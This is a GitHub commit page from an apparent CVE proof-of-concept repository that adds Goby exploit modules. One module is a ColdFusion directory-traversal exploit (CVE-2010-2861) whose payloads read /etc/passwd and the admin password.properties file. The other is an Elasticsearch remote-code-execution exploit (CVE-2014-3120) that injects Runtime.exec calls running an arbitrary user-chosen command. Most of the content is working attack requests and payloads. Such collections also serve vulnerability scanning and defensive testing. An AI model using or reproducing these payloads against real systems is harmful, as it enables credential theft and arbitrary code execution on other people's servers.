Skip to content

Commit

Permalink
add some goby poc
Browse files Browse the repository at this point in the history
  • Loading branch information
@cckuailong
cckuailong committed Dec 7, 2021
1 parent 3331c19 commit e2afcf5
Show file tree
Hide file tree
Showing 223 changed files with 3,753 additions and 2 deletions.
3 changes: 1 addition & 2 deletions .gitignore
View file
Original file line number Diff line number Diff line change
@@ -1,2 +1 @@
script/
CVE-2021-41773/
script/
0 ...CVE-2010-1871/poc/xray/CVE-2010-1871.yaml → .../CVE-2010-1871/poc/xray/CVE-2010-1871.yml
View file
File renamed without changes.
103 changes: 103 additions & 0 deletions 2010/CVE-2010-2861/poc/goby/CVE-2010-2861.json
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,103 @@
{
"Name": "Coldfusion LFI CVE-2010-2861",
"Level": "2",
"Tags": [
"lfi"
],
"GobyQuery": "app=\"Adobe-ColdFusion\"",
"Description": "Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.",
"Product": "Adobe ColdFusion",
"Homepage": "https://www.adobe.com/products/coldfusion-family.html",
"Author": "aetkrad",
"Impact": "<p>read arbitrary files<br></p>",
"Recommendation": "",
"References": [],
"HasExp": true,
"ExpParams": [
{
"Name": "Filepath",
"Type": "select",
"Value": "../../../../../../../../../../etc/passwd%00en,../../../../../../../lib/password.properties%00en"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "rdspassword=",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "encrypted=",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/CFIDE/administrator/enter.cfm?locale={{{cmd}}}",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"PostTime": "2021-11-08 15:51:21",
"GobyVersion": "1.8.302"
}
0 ...CVE-2010-2861/poc/xray/CVE-2010-2861.yaml → .../CVE-2010-2861/poc/xray/CVE-2010-2861.yml
View file
File renamed without changes.
0 ...CVE-2012-1823/poc/xray/CVE-2012-1823.yaml → .../CVE-2012-1823/poc/xray/CVE-2012-1823.yml
View file
File renamed without changes.
191 changes: 191 additions & 0 deletions 2014/CVE-2014-3120/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,191 @@
package exploits

import (
"git.gobies.org/goby/goscanner/goutils"
)

func init() {
expJson := `{
"Name": "Elasticsearch Remote Code Execution CVE-2014-3120",
"Description": "The default configuration before Elasticsearch 1.2 enabled dynamic scripting, which allowed remote attackers to execute arbitrary MVEL expressions and Java code through the source parameter of _search.",
"Product": "Elasticsearch",
"Homepage": "https://gobies.org/",
"DisclosureDate": "2021-04-10",
"Author": "zhzyker",
"GobyQuery": "product=elasticsearch",
"Level": "3",
"Impact": "<p>ElasticSearch is an open source, distributed, RESTful search engine built on Lucene. Designed for use in cloud computing, it can achieve real-time, stable, reliable and fast search, and is easy to install and use. Supports data indexing via HTTP request and using JSON.</p><p>Since ElasticSearch has enabled dynamic script execution by default, any user can execute arbitrary Java code by constructing a specially crafted submission.</p>",
"Recommandation": "<p>The official version of elasticsearch 1.2 has been publicly released, and the dynamic script execution function is disabled by default.<br></p>",
"References": [
"https://github.com/zhzyker"
],
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/website/blog/",
"follow_redirect": true,
"header": {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close",
"Accept-Language": "en",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "{ \"name\": \"cve-2014-3120\" }"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "201",
"bz": "http_code"
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/_search?pretty",
"follow_redirect": true,
"header": {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close",
"Accept-Language": "en",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"script_fields\":{\"command\":{\"script\":\"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"echo 0d455d3d2044e6e7781771d932e68dbc_goby_nb\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"}}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "0d455d3d2044e6e7781771d932e68dbc",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/website/blog/",
"follow_redirect": true,
"header": {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close",
"Accept-Language": "en",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "{ \"name\": \"cve-2014-3120\" }"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "201",
"bz": "http_code"
}
]
},
"SetVariable": [
"output|lastbody"
]
},
{
"Request": {
"method": "POST",
"uri": "/_search?pretty",
"follow_redirect": true,
"header": {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close",
"Accept-Language": "en",
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"script_fields\":{\"command\":{\"script\":\"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"{{{cmd}}}\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"}}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": "http_code"
}
]
},
"SetVariable": [
"output|lastbody|regex|(?s)\"command\" : (.*)}"
]
}
],
"Tags": [
"RCE"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`

ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}
0 ...CVE-2014-3120/poc/xray/CVE-2014-3120.yaml → .../CVE-2014-3120/poc/xray/CVE-2014-3120.yml
View file
File renamed without changes.
0 ...CVE-2014-3704/poc/xray/CVE-2014-3704.yaml → .../CVE-2014-3704/poc/xray/CVE-2014-3704.yml
View file
File renamed without changes.
Loading

0 comments on commit e2afcf5

Please sign in to comment.